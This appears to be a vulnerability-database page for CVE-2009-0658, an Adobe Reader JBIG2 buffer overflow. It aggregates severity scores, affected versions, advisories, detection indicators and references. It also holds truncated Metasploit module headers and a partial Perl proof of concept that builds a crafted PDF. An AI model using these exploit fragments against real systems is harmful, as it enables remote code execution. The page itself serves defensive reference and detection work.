CVE-2009-0658
published 2009-02-20CVE-2009-0658: Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document…
PriorityP180high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
87.72%
99.7th percentile
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | acrobat | — | — |
| adobe | acrobat | 7.0 – 7.1.1 | — |
| adobe | acrobat | 8.0 – 8.1.4 | — |
| adobe | acrobat_reader | — | — |
| adobe | acrobat_reader | >= 7.0 < 7.1.1 | 7.1.1 |
| adobe | acrobat_reader | 7.0 – 7.1.1 | — |
| adobe | acrobat_reader | >= 8.0 < 8.1.3 | 8.1.3 |
| adobe | acrobat_reader | 8.0 – 8.1.4 | — |
| adobe | acrobat_reader | >= 9.0 < 9.1 | 9.1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x00\x01 + $size (\x40\x00) + $factor (ABCD) + \x13 + 'A' x 8314
- →Detect PDF files containing a JBIG2Decode filter stream with FlateDecode and ASCIIHexDecode encoding layers — the specific filter chain used in CVE-2009-0658 exploitation. ↗
- →Detect PDF files with embedded JavaScript objects whose concatenated variable names exhibit high entropy — a heap-spray obfuscation indicator for this exploit. ↗
- →Detect reverse TCP connect-back shellcode embedded inside unescape() calls within compressed JavaScript objects in PDF files. ↗
- →The exploit PDF uses a crafted JBIG2 stream starting with bytes \x00\x00\x00\x01 followed by a 2-byte size field and a 4-byte factor field; look for this byte pattern inside JBIG2Decode stream objects. ↗
- →The Metasploit module targets BIB.dll return addresses; monitor for PDF-triggered code execution that pivots through BIB.dll at the documented ROP/return addresses. ↗
- →The exploit was delivered in the wild by Trojan.Pidief.E; AV/EDR detections for this family name indicate active exploitation of CVE-2009-0658. ↗
- ·The Metasploit module's heap-spray uses randomized JavaScript variable names to evade static string matching; signature-based detection on variable names alone will miss obfuscated variants. ↗
- ·The exploit PDF uses multiple stacked encoding layers (FlateDecode + ASCIIHexDecode + JBIG2Decode); detection engines must inflate and decode all layers before inspecting the JBIG2 stream content. ↗
- ·The Metasploit JBIG2 module contained a bug that was discovered and fixed during research; older Metasploit-generated samples may differ from current exploit structure. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wr9v-3qgm-q33g: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9
ghsa_unreviewed·2022-05-02·CVSS 7.8
CVE-2009-0927 [HIGH] CWE-121 GHSA-wr9v-3qgm-q33g: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
GHSA
GHSA-pm5j-jrq9-vmhx: Buffer overflow in Adobe Reader 9
ghsa_unreviewed·2022-05-02
CVE-2009-0658 [HIGH] CWE-119 GHSA-pm5j-jrq9-vmhx: Buffer overflow in Adobe Reader 9
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
VulnCheck
Adobe Acrobat and Reader Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2009·CVSS 7.8
CVE-2009-0658 [HIGH] Adobe Acrobat and Reader Improper Restriction of Operations within the Bounds of a Memory Buffer
Adobe Acrobat and Reader Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
Affected: Adobe Acrobat and Reader
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2009-0658; https://users.ece.cmu.edu/~tdumitra/public_documents/bilge12_zero_day.pdf
Red Hat
security flaw
vendor_redhat·2009-03-18·CVSS 7.8
CVE-2009-0927 [HIGH] security flaw
security flaw
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
Red Hat
acroread: multiple JBIG2-related security flaws
vendor_redhat·2009-02-19·CVSS 7.8
CVE-2009-0658 [HIGH] acroread: multiple JBIG2-related security flaws
acroread: multiple JBIG2-related security flaws
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
No detection rules found.
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)
exploitdb·2010-09-25
CVE-2009-0658 Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)
---
##
# $Id: adobe_jbig2decode.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort',
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
exploitdb·2010-06-15
CVE-2009-0658 Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
---
##
# $Id: adobe_jbig2decode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort
Exploit-DB
Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)
exploitdb·2009-02-23
CVE-2009-0658 Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)
Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)
---
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"t
Metasploit
Adobe JBIG2Decode Memory Corruption
metasploit
Adobe JBIG2Decode Memory Corruption
Adobe JBIG2Decode Memory Corruption
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
Metasploit
Adobe JBIG2Decode Heap Corruption
metasploit
Adobe JBIG2Decode Heap Corruption
Adobe JBIG2Decode Heap Corruption
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
Bugzilla
CVE-2009-0927 security flaw
bugzilla·2018-08-16·CVSS 7.8
CVE-2009-0927 [HIGH] CVE-2009-0927 security flaw
CVE-2009-0927 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
Bugzilla
Ghostscript: Multiple NULL pointer dereferences in JBIG2 decoder
bugzilla·2009-06-02·CVSS 7.8
CVE-2009-0658 [HIGH] Ghostscript: Multiple NULL pointer dereferences in JBIG2 decoder
Ghostscript: Multiple NULL pointer dereferences in JBIG2 decoder
Multiple NULL pointer dereference deficiencies were found in the Ghostscript's JBIG2 compression format decoder. Opening a specially-crafted Portable Document
Format (PDF) file would cause "pdf2ps" to crash.
Note: This bug was discovered by PoC provided for the Adobe Reader 9.0
and Adobe Acrobat 9.0 CVE-2009-0658 flaw.
PoC:
http://milw0rm.com/sploits/2009-41414141.pdf
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
http://www.milw0rm.com/exploits/8090
http://www.milw0rm.com/exploits/8099
http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html
http://milw0rm.com/exploits/8280
http://www.adobe.com/support/security/bulletins/apsb09-04.html
http://www.adobe.com/support/secu
Bugzilla
CVE-2009-0658, CVE-2009-0193, CVE-2009-0928, CVE-2009-1061, CVE-2009-1062 acroread: multiple JBIG2-related security flaws
bugzilla·2009-02-23·CVSS 9.3
CVE-2009-0658 [CRITICAL] CVE-2009-0658, CVE-2009-0193, CVE-2009-0928, CVE-2009-1061, CVE-2009-1062 acroread: multiple JBIG2-related security flaws
CVE-2009-0658, CVE-2009-0193, CVE-2009-0928, CVE-2009-1061, CVE-2009-1062 acroread: multiple JBIG2-related security flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-0658 to
the following vulnerability:
Buffer overflow in Adobe Reader 9.0 and earlier and Acrobat 9.0 and
earlier allows remote attackers to execute arbitrary code via a
crafted PDF document, related to a non-JavaScript function call, as
exploited in the wild in February 2009 by Trojan.Pidief.E.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
http://isc.sans.org/diary.html?n&storyid=5902
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219
http://www.symantec.com/security_response/writeup.jsp?docid=2009-021212-5523-99&tabid=2
http://www.adobe.com/support/security/ad
Talos
A New Detection Framework
blogs_talos·2010-04-22
A New Detection Framework
We just completed a talk here in Dubai on some detection capability research the VRT has been doing. The subtitle of the presentation, "What would you do with a pointer and a size?" pretty much sums up the potential of the project. It all started last December at the SANS IDS conference. In talking to both attendees and presenters, it became clear there was a lack of capability for high-end security and response personnel. Repeatedly we were asked about providing a greater depth of detection, dropping a file to disk for longer analysis and logging packets for an extended period of time. In short, there were solutions needed that weren't being provided.
So Patrick Mullen and I sat down and started fiddling with some ideas. I worked on deep parsing and detection on PDF files and Patrick wor
Talos
A New Detection Framework
blogs_talos·2010-04-22
A New Detection Framework
## A New Detection Framework
We just completed a talk here in Dubai on some detection capability research the VRT has been doing. The subtitle of the presentation, "What would you do with a pointer and a size?" pretty much sums up the potential of the project. It all started last December at the SANS IDS conference. In talking to both attendees and presenters, it became clear there was a lack of capability for high-end security and response personnel. Repeatedly we were asked about providing a greater depth of detection, dropping a file to disk for longer analysis and logging packets for an extended period of time. In short, there were solutions needed that weren't being provided.
So Patrick Mullen and I sat down and started fiddling with some ideas. I worked on deep parsing and detectio
http://isc.sans.org/diary.html?n&storyid=5902http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-04/msg00010.htmlhttp://osvdb.org/52073http://secunia.com/advisories/33901http://secunia.com/advisories/34392http://secunia.com/advisories/34490http://secunia.com/advisories/34706http://secunia.com/advisories/34790http://security.gentoo.org/glsa/glsa-200904-17.xmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-66-256788-1http://www.adobe.com/support/security/advisories/apsa09-01.htmlhttp://www.adobe.com/support/security/bulletins/apsb09-04.htmlhttp://www.kb.cert.org/vuls/id/905281http://www.redhat.com/support/errata/RHSA-2009-0376.htmlhttp://www.securityfocus.com/bid/33751http://www.securitytracker.com/id?1021739http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219http://www.symantec.com/security_response/writeup.jsp?docid=2009-021212-5523-99&tabid=2http://www.us-cert.gov/cas/techalerts/TA09-051A.htmlhttp://www.vupen.com/english/advisories/2009/0472http://www.vupen.com/english/advisories/2009/1019https://exchange.xforce.ibmcloud.com/vulnerabilities/48825https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5697https://www.exploit-db.com/exploits/8090https://www.exploit-db.com/exploits/8099http://isc.sans.org/diary.html?n&storyid=5902http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-04/msg00010.htmlhttp://osvdb.org/52073http://secunia.com/advisories/33901http://secunia.com/advisories/34392http://secunia.com/advisories/34490http://secunia.com/advisories/34706http://secunia.com/advisories/34790http://security.gentoo.org/glsa/glsa-200904-17.xmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-66-256788-1http://www.adobe.com/support/security/advisories/apsa09-01.htmlhttp://www.adobe.com/support/security/bulletins/apsb09-04.htmlhttp://www.kb.cert.org/vuls/id/905281http://www.redhat.com/support/errata/RHSA-2009-0376.htmlhttp://www.securityfocus.com/bid/33751http://www.securitytracker.com/id?1021739http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219http://www.symantec.com/security_response/writeup.jsp?docid=2009-021212-5523-99&tabid=2http://www.us-cert.gov/cas/techalerts/TA09-051A.htmlhttp://www.vupen.com/english/advisories/2009/0472http://www.vupen.com/english/advisories/2009/1019https://exchange.xforce.ibmcloud.com/vulnerabilities/48825https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5697https://www.exploit-db.com/exploits/8090https://www.exploit-db.com/exploits/8099
2009-02-20
Published
Exploited in the wild